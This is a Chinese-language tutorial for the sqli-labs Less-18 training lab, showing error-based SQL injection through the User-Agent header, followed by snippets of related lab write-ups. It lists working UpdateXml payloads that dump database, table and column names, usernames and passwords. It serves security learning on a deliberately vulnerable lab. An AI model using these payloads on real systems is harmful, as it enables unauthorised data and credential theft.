【sqli-labs】 less18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

这次username和password都进行了输入校验

但是ip和uagent没有校验

当我们用admin admin登陆成功后,就会一条插入语句

由于程序无条件的信任了浏览器的header信息,那么通过修改http包的header信息构造注入

使用burpsuite进行包拦截/修改

修改user-agent字段,加个单引号

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0‘

利用UpdateXml函数报错来显示数据

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,database(),0x7e),1),1,1)#

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),0x7e),1),1,1)#

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘users‘ and table_schema=‘security‘ limit 0,1 ),0x7e),1),1,1)#

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select username from (select username from users limit 2,1) a),0x7e),1),1,1)#

User-Agent: 123‘ AND UpdateXml(1,concat(0x7e,(select password from (select password from users limit 2,1) a),0x7e),1),1,1)#

原文地址:https://www.cnblogs.com/superkrissV/p/8353590.html

时间: 2024-10-27 18:12:01

【sqli-labs】 less18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)的相关文章

Less(20)POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

1.单引号,报错型,cookie型注入. (1)登录后页面显示: (2)查看一下php文件 可以看到查询语句查询cookee,那我们就在cookies里面进行注入 (3)抓包看一下: 看到cookie:uname=admin ,就可以以cookie注入了 (4)加单引号发现: 爆出语法错误,看得出来就是单引号型; (5)接下来查一下行数 Cookie:uname=admin' order by 3 --+ //正常 Cookie:uname=admin' order by 4 --+  //不正

Less(19)POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

1.单引号,报错型,referer型注入点: 本题和上一题很像,回显是referer,查一下php文加可以发现,insert语句中向数据库插入了referer,所以注入点改为referer 2.爆破 (1)Referer: ' and extractvalue(1,concat(0x7e,(select version()),0x7e)) and ' 发现没问题 (2)爆库:' and extractvalue(1,concat(0x7e,(select database()),0x7e)) a

Sqli labs系列-less-1 详细篇

要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了,我就开始弄这个,毕竟这个里面涉及到的 SQL 注入知识很全,我贴一个下载地址:Sqli labs系列下载地址 对了还有我这个系列的头顶图,那个图是某个低调群的活跃用户装X墙,纯属装 X ,娱乐着玩了,大家别当真哈. 开了正文开始了! 首先我们先开始第一关,然后构造下注入环境,也就是在 http://

Sqli labs系列-less-2 详细篇

就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊...好歹我也是上打过网络安全攻防平台,注入卡在第七关,我下玩过 web_for_pentester ,web渗透靶机2pentester_II_i386,这些靶场的小菜比... 好了,不扯了,现在开始扯这个第二关. 原本想着明天闲着没事了玩玩吧,后来,我今天也是闲的没事,我就继续开始玩玩吧. 结果玩

bWAPP----Mail Header Injection (SMTP)

Mail Header Injection (SMTP) 本地没有搭环境,没法演示,附上转载的 https://www.acunetix.com/blog/articles/email-header-injection/ 什么是电子邮件标题注入? 发表于 2017年5月3日由伊恩·马斯喀特 通常的做法是网站实施联系表单,反过来将合法用户的电子邮件发送给消息的预期收件人.大多数情况下,这样的联系表单将设置SMTP标头From,Reply-to以便让收件人轻松处理联系表单中的通信,就像其他电子邮件一

ajax请求node.js接口时出现 No 'Access-Control-Allow-Origin' header is present on the requested resource错误

ajax请求node.js接口出现了如下的错误: XMLHttpRequest cannot load http://xxx.xxx.xx.xx:8888/getTem?cityId=110105&date=2015-03-04. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'null' is therefore not allowed access. 百度了一下,原来是

mybatis之insert语句报错Cause: java.sql.SQLException: sql injection violation, syntax error: ERROR. token : WHERE,

报错日志:org.springframework.jdbc.UncategorizedSQLException: Error updating database. Cause: java.sql.SQLException: sql injection violation, syntax error: ERROR. token : WHERE, pos : 315 : UPDATE jxdx_leave 报错原因:多了一个逗号: 关键看token后面,这里通过token可以直接定位报错地点: 原文

Sqli labs相关环境的下载与安装

我们在学习这项内容之前,需要安装两样应用程序,下载路径的搜索比较麻烦,这里提供两个已知的百度网盘网址及其提取码以供使用: 1.安装phpstudy; 链接:https://pan.baidu.com/s/1yeOLf7Mty5bEGLPUSodILg 提取码:y3vl 2.安装sqli-labs-masters; 将sqli-labs-masters解压,放到phpStudy安装目录下的/PHPTutorial/WWW 链接:https://pan.baidu.com/s/1aKbc0fnsLg

sqli labs注入记录(Less-1至Less-10)

Less-1:基于错误的GET单引号字符型注入 我们首先注入一个单引号’,出现SQL语法错误,多出一个单引号,后面闭合语句也是用的单引号: http://127.0.0.1/sqli_labs/Less-1/?id=1’ 再次注入一条SQL语句,因为条件永远为真,响应正常: http://127.0.0.1/sqli_labs/Less-1/?id=1' and '1'='1 下面猜解字段数: http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1